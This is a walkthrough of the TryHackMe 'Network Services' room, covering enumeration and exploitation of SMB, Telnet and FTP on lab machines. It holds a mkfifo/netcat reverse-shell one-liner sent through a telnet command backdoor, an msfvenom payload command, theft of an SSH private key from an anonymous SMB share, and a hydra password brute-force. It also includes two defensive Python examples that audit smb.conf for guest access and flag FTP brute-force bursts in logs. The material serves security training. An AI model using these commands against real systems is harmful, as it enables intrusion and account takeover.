TryHackMe - Network Services - Walkthrough

Introduction

Today we're going to be doing a walkthrough for the Network Services room hosted at https://tryhackme.com/room/networkservices . For this walkthrough, we'll be using two virtual machines (VMs): a Kali Linux VM as our attacking machine, and the deployed vulnerable VM clients as the victim machines.

Task 1 - Get Connected

Questions

Ready? Let's get going!

No answer needed

Task 2 - Understanding SMB

Questions

What does SMB stand for?

Answer contained within Task description.

What type of protocol is SMB?

Answer contained within Task description.

What do clients connect to servers using?

Answer contained within Task description.

What systems does Samba run on?

Answer contained within Task description.

Task 3 - Enumerating SMB

Questions

Conduct an nmap scan of your choosing. How many ports are open?

nmap -p- -T4 10.10.49.163


What ports is SMB running on?

nmap -p- -T4 10.10.49.163


Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

enum4linux -a 10.10.49.163 | grep -i "domain/workgroup"


What comes up as the name of the machine?

enum4linux -a 10.10.49.163


What operating system version is running?

enum4linux -a 10.10.49.163 | grep -i "os version"


What share sticks out as something we might want to investigate?

enum4linux -a 10.10.49.163


Task 4 - Exploiting SMB


Questions

What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?

Answer contained within Task description.

Great! Now you've got a hang of the syntax, let's have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.

No answer needed

Does the share allow anonymous access? Y/N?

smbclient //10.10.49.163/<answerFromPreviousTask> -U Anonymous
input blank password


Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

dir
get "Working From Home Information.txt"
exit
cat Working\ From\ Home\ Information.txt


What service has been configured to allow him to work from home?

cat Working\ From\ Home\ Information.txt


Okay! Now we know this, what directory on the share should we look in?

smbclient //10.10.49.163/<answerFromPreviousTask> -U Anonymous
input blank password
dir


This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

cd <answer from previous question>
dir


Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

get <answer from previous question>
exit
chmod 600 <answer from previous question>
ssh -i <answer from previous question> <answer from previous question>@10.10.49.163
yes
cat smb.txt
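
Defender's view of Task 4: the share handed a private key to a blank-password login because it was configured for guest access. The following is an added example, not part of the room or of Samba's own tooling, that audits an smb.conf for that weakness and shows the hardened form beside it; both configs, the share name, its path and the account name are constructed placeholders.

```python
"""Audit a Samba smb.conf for shares reachable with a blank (guest) login.
Added example, not part of the room; configs, share name and path are constructed."""
import configparser

# Constructed: a share open to a blank login, as the one in the room behaved.
WEAK_CONF = """
[global]
security = user
map to guest = Bad User

[files]
path = /srv/samba/files
guest ok = yes
"""

# Constructed: the same share with guest access off and limited to a named user.
HARDENED_CONF = """
[global]
security = user
map to guest = Never

[files]
path = /srv/samba/files
guest ok = no
valid users = fileowner
"""

def _is_yes(value):
    # Samba accepts yes/true/1 for boolean parameters.
    return value.strip().lower() in ("yes", "true", "1")

def audit_smb_conf(text):
    """Return (section, finding) tuples describing anonymous-access exposure."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)  # smb.conf is INI-like; option names are case-insensitive
    findings = []
    map_guest = cp.get("global", "map to guest", fallback="Never").strip().lower()
    if map_guest != "never":
        findings.append(("global", "map to guest = %s: logins without a valid "
                         "account fall back to the guest account" % map_guest))
    for share in cp.sections():
        if share == "global":
            continue
        sec = cp[share]
        # 'public' is a synonym of 'guest ok'; 'guest only' forces guest access.
        guest = _is_yes(sec.get("guest ok", sec.get("public", "no")))
        if guest or _is_yes(sec.get("guest only", "no")):
            findings.append((share, "guest ok = yes: readable with a blank password"))
    return findings
```

Run it against a real smb.conf and any share it reports is one that enum4linux and a blank-password smbclient login will list and read, so that is where stray keys and documents should never be stored.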




Task 5 - Understanding Telnet

Questions

What is Telnet?

Answer contained within Task description

What has slowly replaced Telnet?

Answer contained within Task description

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

Answer contained within Task description

The lack of what means that all Telnet communication is in plaintext?

Research how plaintext is converted to ciphertext. That process is the answer.

Task 6 - Enumerating Telnet

Questions

How many ports are open on the target machine?

nmap -p- -A 10.10.11.225


What port is this?

nmap -p- -A 10.10.11.225


This port is unassigned, but still lists the protocol it's using, what protocol is this?

nmap -p- -A 10.10.11.225


Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

nmap -A 10.10.11.225


Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.

No answer needed

Based on the title returned to us, what do we think this port could be used for?

nmap -p- -A 10.10.11.225


Who could it belong to? Gathering possible usernames is an important step in enumeration.

nmap -p- -A 10.10.11.225


Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

No answer needed

Task 7 - Exploiting Telnet

Questions


Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

No answer needed

(unofficial)

telnet 10.10.11.225 8012

Great! It's an open telnet connection! What welcome message do we receive?

telnet 10.10.11.225 8012


Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

Experiment. Does the system return anything after you input any commands?

Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.

No answer needed

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

No answer needed

(unofficial)

sudo tcpdump ip proto \\icmp -i eth0


Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

ip addr


from telnet terminal:
.RUN ping 10.10.213.12 -c 1



Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!

No answer needed

What word does the generated payload start with?

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.213.12 lport=4444 R


What would the command look like for the listening port we selected in our payload?

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.213.12 lport=4444 R


Combine this information with the command string listed in the Task description, replacing [listening port] with the variable found in the screenshot above.

Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully, this will give us a shell on the target machine!

No answer needed

(unofficial)

nc -lvp 4444
on telnet terminal:
.RUN mkfifo /tmp/rvyrqt; nc 10.10.213.12 4444 0</tmp/rvyrqt | /bin/sh >/tmp/rvyrqt 2>&1; rm /tmp/rvyrqt




Success! What is the contents of flag.txt?

cat flag.txt


Task 8 - Understanding FTP

Questions

What communications model does FTP use?

Answer contained within Task description

What's the standard FTP port?

Google"ftp port" for the answer

How many modes of FTP connection are there?

Answer contained within Task description

Task 9 - Enumerating FTP

Questions

How many ports are open on the target machine?

nmap -p- 10.10.91.132
nmap -F -sU 10.10.91.132



What port is ftp running on?

FTP is running on the "standard" port.

What variant of FTP is running on it?

nmap -p21 -sV 10.10.91.132


What is the name of the file in the anonymous FTP directory?

ftp 10.10.91.132
anonymous
input blank password
dir


What do we think a possible username could be?

get PUBLIC_NOTICE.txt
exit
cat PUBLIC_NOTICE.txt


Great! Now we've got details about the FTP server and, crucially, a possible username. Let's see what we can do with that...

No answer needed

Task 10 - Exploiting FTP

Questions

What is the password for the user "mike"?

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.91.132 ftp
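
From the defender's side, the hydra run above appears in the FTP server's login log as a burst of FAIL LOGIN entries for one account from one client, followed by an OK LOGIN once the wordlist hits. As an added example that is not part of the room, this parses log lines in the login-log format used by vsftpd and flags that pattern; the lines are constructed (the client address and the user "mike" are taken from this walkthrough, the second client address is made up).

```python
"""Flag an FTP password-guessing burst, like the hydra run above, in vsftpd-style
login logs. Added example, not part of the room; the log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed: five failures for 'mike' from one client within seconds, then a success.
SAMPLE_LOG = """\
Tue Oct 13 12:00:01 2020 [pid 2101] [mike] FAIL LOGIN: Client "10.10.213.12"
Tue Oct 13 12:00:01 2020 [pid 2102] [mike] FAIL LOGIN: Client "10.10.213.12"
Tue Oct 13 12:00:02 2020 [pid 2103] [mike] FAIL LOGIN: Client "10.10.213.12"
Tue Oct 13 12:00:02 2020 [pid 2104] [mike] FAIL LOGIN: Client "10.10.213.12"
Tue Oct 13 12:00:03 2020 [pid 2105] [mike] FAIL LOGIN: Client "10.10.213.12"
Tue Oct 13 12:00:04 2020 [pid 2106] [mike] OK LOGIN: Client "10.10.213.12"
Tue Oct 13 12:30:00 2020 [pid 2200] [anonymous] OK LOGIN: Client "10.10.0.5"
"""

LINE_RE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                     r'\[(?P<user>[^\]]*)\] (?P<event>OK LOGIN|FAIL LOGIN): Client "(?P<ip>[^"]+)"')

def parse_line(line):
    """Return (timestamp, user, event, client_ip) or None for lines we do not track."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("event"), m.group("ip")

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Map client IP -> {'failures', 'users', 'success_after'} for every client with
    at least `threshold` FAIL LOGINs inside a sliding window of `window_s` seconds."""
    recent = defaultdict(deque)   # client ip -> timestamps of failures in the window
    users = defaultdict(set)      # client ip -> account names it tried
    hits = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, event, ip = parsed
        if event == "FAIL LOGIN":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while (ts - q[0]).total_seconds() > window_s:   # drop stale failures
                q.popleft()
            if len(q) >= threshold and ip not in hits:
                hits[ip] = {"failures": len(q), "users": set(users[ip]), "success_after": False}
        elif event == "OK LOGIN" and ip in hits:
            hits[ip]["success_after"] = True   # password found after the burst
    return hits
```

A hit with success_after set is the case that matters most: the guessing worked, so the account's password needs changing and the session that followed needs review.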


Bingo! Now, let's connect to the FTP server as this user using "ftp [IP]" and entering the credentials when prompted

No answer needed

What is ftp.txt?

ftp 10.10.91.132
mike
password: password
get ftp.txt
exit
cat ftp.txt


Task 11 - Expanding Your Knowledge

Questions

Well done, you did it!

No answer needed

Finish
